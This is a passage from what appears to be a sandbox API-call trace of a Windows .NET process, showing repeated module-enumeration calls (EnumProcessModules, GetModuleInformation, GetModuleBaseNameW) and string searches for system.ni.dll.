lpmodinfo=0x18e9a4*(lpBaseOfDll=0x77bb0000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0107.649] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75b90000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x75b90000, SizeOfImage=0x110000, EntryPoint=0x75ba32d3)) returned 1 [0107.650] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77260000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x77260000, SizeOfImage=0x46000, EntryPoint=0x77267478)) returned 1 [0107.650] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75cf0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x75cf0000, SizeOfImage=0xa0000, EntryPoint=0x75d049e5)) returned 1 [0107.650] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x758e0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x758e0000, SizeOfImage=0xac000, EntryPoint=0x758ea472)) returned 1 [0107.650] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ef0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x75ef0000, SizeOfImage=0x19000, EntryPoint=0x75ef4975)) returned 1 [0107.650] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76110000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x76110000, SizeOfImage=0xf0000, EntryPoint=0x76120569)) returned 1 [0107.650] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75710000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x75710000, SizeOfImage=0x60000, EntryPoint=0x7572a3b3)) returned 1 [0107.651] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75700000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x75700000, SizeOfImage=0xc000, EntryPoint=0x757010e1)) returned 1 [0107.651] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75d90000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x75d90000, SizeOfImage=0x5000, EntryPoint=0x75d91438)) returned 1 [0107.651] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76070000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x76070000, SizeOfImage=0x57000, EntryPoint=0x76089ba6)) returned 1 [0107.651] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f30000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x76f30000, SizeOfImage=0x90000, EntryPoint=0x76f46343)) returned 1 [0107.652] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770d0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x770d0000, SizeOfImage=0x100000, EntryPoint=0x770eb6ed)) returned 1 [0107.652] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76fc0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x76fc0000, SizeOfImage=0xa000, EntryPoint=0x76fc36a0)) returned 1 [0107.652] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772b0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x772b0000, SizeOfImage=0x9d000, EntryPoint=0x772e3fd7)) returned 1 [0107.653] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75da0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x75da0000, SizeOfImage=0x60000, EntryPoint=0x75db158f)) returned 1 [0107.653] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759a0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x759a0000, SizeOfImage=0xcc000, EntryPoint=0x759a168b)) returned 1 [0107.654] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754f0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x754f0000, SizeOfImage=0x4a000, EntryPoint=0x754f2e54)) returned 1 [0107.654] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75490000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x75490000, SizeOfImage=0x5f000, EntryPoint=0x75492134)) returned 1 [0107.654] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75480000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x75480000, SizeOfImage=0x5000, EntryPoint=0x754811d0)) returned 1 [0107.655] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76260000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x76260000, SizeOfImage=0xc4a000, EntryPoint=0x762e1601)) returned 1 [0107.655] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75460000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x75460000, SizeOfImage=0x1c000, EntryPoint=0x7546a431)) returned 1 [0107.656] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75e00000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x75e00000, SizeOfImage=0x6000, EntryPoint=0x75e01782)) returned 1 [0107.656] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75450000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x75450000, SizeOfImage=0x7000, EntryPoint=0x7545128d)) returned 1 [0107.657] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x752c0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x752c0000, SizeOfImage=0x190000, EntryPoint=0x7535d026)) returned 1 [0107.657] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75f10000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x75f10000, SizeOfImage=0x15c000, EntryPoint=0x75f5ba3d)) returned 1 [0107.658] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x751e0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x751e0000, SizeOfImage=0xd4000, EntryPoint=0x752130d2)) returned 1 [0107.658] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750e0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x750e0000, SizeOfImage=0xf5000, EntryPoint=0x75134160)) returned 1 [0107.659] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74de0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x74de0000, SizeOfImage=0x13b000, EntryPoint=0x74ebcc89)) returned 1 [0107.659] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750d0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x750d0000, SizeOfImage=0xd000, EntryPoint=0x750d13e4)) returned 1 [0107.660] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d80000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x74d80000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0107.660] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d00000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x74d00000, SizeOfImage=0x78000, EntryPoint=0x74d0f7ba)) returned 1 [0107.661] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x756d0000, lpmodinfo=0x18e9a4, cb=0xc | out: lpmodinfo=0x18e9a4*(lpBaseOfDll=0x756d0000, SizeOfImage=0x9000, EntryPoint=0x756d1220)) returned 1 [0107.661] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x756d0000, lpBaseName=0x18e79c, nSize=0x104 | out: lpBaseName="VERSION.dll") returned 0xb [0107.663] StrStrIW (lpFirst="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", lpSrch="\\system.ni.dll") returned 0x0 [0107.717] GetCurrentProcess () returned 0xffffffff [0107.717] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18e204, cb=0x1000, lpcbNeeded=0x18f418 | out: lphModule=0x18e204, lpcbNeeded=0x18f418) returned 1 [0107.717] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0107.717] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77bb0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x77bb0000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0107.718] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75b90000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x75b90000, SizeOfImage=0x110000, EntryPoint=0x75ba32d3)) returned 1 [0107.718] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77260000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x77260000, SizeOfImage=0x46000, EntryPoint=0x77267478)) returned 1 [0107.718] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75cf0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x75cf0000, SizeOfImage=0xa0000, EntryPoint=0x75d049e5)) returned 1 [0107.718] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x758e0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x758e0000, SizeOfImage=0xac000, EntryPoint=0x758ea472)) returned 1 [0107.718] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ef0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x75ef0000, SizeOfImage=0x19000, EntryPoint=0x75ef4975)) returned 1 [0107.718] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76110000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x76110000, SizeOfImage=0xf0000, EntryPoint=0x76120569)) returned 1 [0107.719] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75710000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x75710000, SizeOfImage=0x60000, EntryPoint=0x7572a3b3)) returned 1 [0107.719] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75700000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x75700000, SizeOfImage=0xc000, EntryPoint=0x757010e1)) returned 1 [0107.719] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75d90000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x75d90000, SizeOfImage=0x5000, EntryPoint=0x75d91438)) returned 1 [0107.719] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76070000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x76070000, SizeOfImage=0x57000, EntryPoint=0x76089ba6)) returned 1 [0107.720] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f30000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x76f30000, SizeOfImage=0x90000, EntryPoint=0x76f46343)) returned 1 [0107.720] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770d0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x770d0000, SizeOfImage=0x100000, EntryPoint=0x770eb6ed)) returned 1 [0107.720] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76fc0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x76fc0000, SizeOfImage=0xa000, EntryPoint=0x76fc36a0)) returned 1 [0107.720] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772b0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x772b0000, SizeOfImage=0x9d000, EntryPoint=0x772e3fd7)) returned 1 [0107.721] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75da0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x75da0000, SizeOfImage=0x60000, EntryPoint=0x75db158f)) returned 1 [0107.721] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759a0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x759a0000, SizeOfImage=0xcc000, EntryPoint=0x759a168b)) returned 1 [0107.721] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754f0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x754f0000, SizeOfImage=0x4a000, EntryPoint=0x754f2e54)) returned 1 [0107.722] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75490000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x75490000, SizeOfImage=0x5f000, EntryPoint=0x75492134)) returned 1 [0107.722] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75480000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x75480000, SizeOfImage=0x5000, EntryPoint=0x754811d0)) returned 1 [0107.723] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76260000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x76260000, SizeOfImage=0xc4a000, EntryPoint=0x762e1601)) returned 1 [0107.723] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75460000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x75460000, SizeOfImage=0x1c000, EntryPoint=0x7546a431)) returned 1 [0107.723] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75e00000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x75e00000, SizeOfImage=0x6000, EntryPoint=0x75e01782)) returned 1 [0107.725] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75450000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x75450000, SizeOfImage=0x7000, EntryPoint=0x7545128d)) returned 1 [0107.725] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x752c0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x752c0000, SizeOfImage=0x190000, EntryPoint=0x7535d026)) returned 1 [0107.726] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75f10000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x75f10000, SizeOfImage=0x15c000, EntryPoint=0x75f5ba3d)) returned 1 [0107.726] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x751e0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x751e0000, SizeOfImage=0xd4000, EntryPoint=0x752130d2)) returned 1 [0107.727] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750e0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x750e0000, SizeOfImage=0xf5000, EntryPoint=0x75134160)) returned 1 [0107.727] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74de0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x74de0000, SizeOfImage=0x13b000, EntryPoint=0x74ebcc89)) returned 1 [0107.728] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750d0000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x750d0000, SizeOfImage=0xd000, EntryPoint=0x750d13e4)) returned 1 [0107.729] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d80000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x74d80000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0107.729] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d00000, lpmodinfo=0x18f40c, cb=0xc | out: lpmodinfo=0x18f40c*(lpBaseOfDll=0x74d00000, SizeOfImage=0x78000, EntryPoint=0x74d0f7ba)) returned 1 [0107.730] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74d00000, lpBaseName=0x18f204, nSize=0x104 | out: lpBaseName="mscoreei.dll") returned 0xc [0107.781] StrStrIW (lpFirst="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", lpSrch="\\system.ni.dll") returned 0x0 [0107.804] GetCurrentProcess () returned 0xffffffff [0107.804] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18e21c, cb=0x1000, lpcbNeeded=0x18f430 | out: lphModule=0x18e21c, lpcbNeeded=0x18f430) returned 1 [0107.805] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0107.805] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77bb0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x77bb0000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0107.805] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75b90000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x75b90000, SizeOfImage=0x110000, EntryPoint=0x75ba32d3)) returned 1 [0107.805] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77260000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x77260000, SizeOfImage=0x46000, EntryPoint=0x77267478)) returned 1 [0107.805] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75cf0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x75cf0000, SizeOfImage=0xa0000, EntryPoint=0x75d049e5)) returned 1 [0107.806] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x758e0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x758e0000, SizeOfImage=0xac000, EntryPoint=0x758ea472)) returned 1 [0107.806] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ef0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x75ef0000, SizeOfImage=0x19000, EntryPoint=0x75ef4975)) returned 1 [0107.806] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76110000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x76110000, SizeOfImage=0xf0000, EntryPoint=0x76120569)) returned 1 [0107.806] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75710000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x75710000, SizeOfImage=0x60000, EntryPoint=0x7572a3b3)) returned 1 [0107.806] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75700000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x75700000, SizeOfImage=0xc000, EntryPoint=0x757010e1)) returned 1 [0107.807] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75d90000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x75d90000, SizeOfImage=0x5000, EntryPoint=0x75d91438)) returned 1 [0107.807] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76070000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x76070000, SizeOfImage=0x57000, EntryPoint=0x76089ba6)) returned 1 [0107.807] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f30000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x76f30000, SizeOfImage=0x90000, EntryPoint=0x76f46343)) returned 1 [0107.807] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770d0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x770d0000, SizeOfImage=0x100000, EntryPoint=0x770eb6ed)) returned 1 [0107.808] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76fc0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x76fc0000, SizeOfImage=0xa000, EntryPoint=0x76fc36a0)) returned 1 [0107.808] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772b0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x772b0000, SizeOfImage=0x9d000, EntryPoint=0x772e3fd7)) returned 1 [0107.808] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75da0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x75da0000, SizeOfImage=0x60000, EntryPoint=0x75db158f)) returned 1 [0107.809] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759a0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x759a0000, SizeOfImage=0xcc000, EntryPoint=0x759a168b)) returned 1 [0107.809] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754f0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x754f0000, SizeOfImage=0x4a000, EntryPoint=0x754f2e54)) returned 1 [0107.809] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75490000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x75490000, SizeOfImage=0x5f000, EntryPoint=0x75492134)) returned 1 [0107.810] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75480000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x75480000, SizeOfImage=0x5000, EntryPoint=0x754811d0)) returned 1 [0107.810] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76260000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x76260000, SizeOfImage=0xc4a000, EntryPoint=0x762e1601)) returned 1 [0107.811] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75460000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x75460000, SizeOfImage=0x1c000, EntryPoint=0x7546a431)) returned 1 [0107.811] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75e00000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x75e00000, SizeOfImage=0x6000, EntryPoint=0x75e01782)) returned 1 [0107.811] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75450000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x75450000, SizeOfImage=0x7000, EntryPoint=0x7545128d)) returned 1 [0107.812] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x752c0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x752c0000, SizeOfImage=0x190000, EntryPoint=0x7535d026)) returned 1 [0107.812] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75f10000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x75f10000, SizeOfImage=0x15c000, EntryPoint=0x75f5ba3d)) returned 1 [0107.813] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x751e0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x751e0000, SizeOfImage=0xd4000, EntryPoint=0x752130d2)) returned 1 [0107.813] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750e0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x750e0000, SizeOfImage=0xf5000, EntryPoint=0x75134160)) returned 1 [0107.814] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74de0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x74de0000, SizeOfImage=0x13b000, EntryPoint=0x74ebcc89)) returned 1 [0107.814] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x750d0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x750d0000, SizeOfImage=0xd000, EntryPoint=0x750d13e4)) returned 1 [0107.815] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d80000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x74d80000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0107.816] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74d00000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x74d00000, SizeOfImage=0x78000, EntryPoint=0x74d0f7ba)) returned 1 [0107.816] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x756d0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x756d0000, SizeOfImage=0x9000, EntryPoint=0x756d1220)) returned 1 [0107.817] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74410000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x74410000, SizeOfImage=0x6a8000, EntryPoint=0x74557040)) returned 1 [0107.817] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74410000, lpBaseName=0x18f21c, nSize=0x104 | out: lpBaseName="clr.dll") returned 0x7 [0107.818] StrStrIW (lpFirst="api-ms-win-core-quirks-l1-1-0.dll", lpSrch="\\system.ni.dll") returned 0x0 [0107.824] GetCurrentProcess () returned 0xffffffff [0107.824] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18ddc4, cb=0x1000, lpcbNeeded=0x18efd8 | out: lphModule=0x18ddc4, lpcbNeeded=0x18efd8) returned 1 [0107.824] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0107.824] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77bb0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x77bb0000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0107.824] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75b90000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x75b90000, SizeOfImage=0x110000, EntryPoint=0x75ba32d3)) returned 1 [0107.825] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77260000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x77260000, SizeOfImage=0x46000, EntryPoint=0x77267478)) returned 1 [0107.825] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75cf0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x75cf0000, SizeOfImage=0xa0000, EntryPoint=0x75d049e5)) returned 1 [0107.825] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x758e0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x758e0000, SizeOfImage=0xac000, EntryPoint=0x758ea472)) returned 1 [0107.825] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ef0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x75ef0000, SizeOfImage=0x19000, EntryPoint=0x75ef4975)) returned 1 [0107.825] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76110000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x76110000, SizeOfImage=0xf0000, EntryPoint=0x76120569)) returned 1 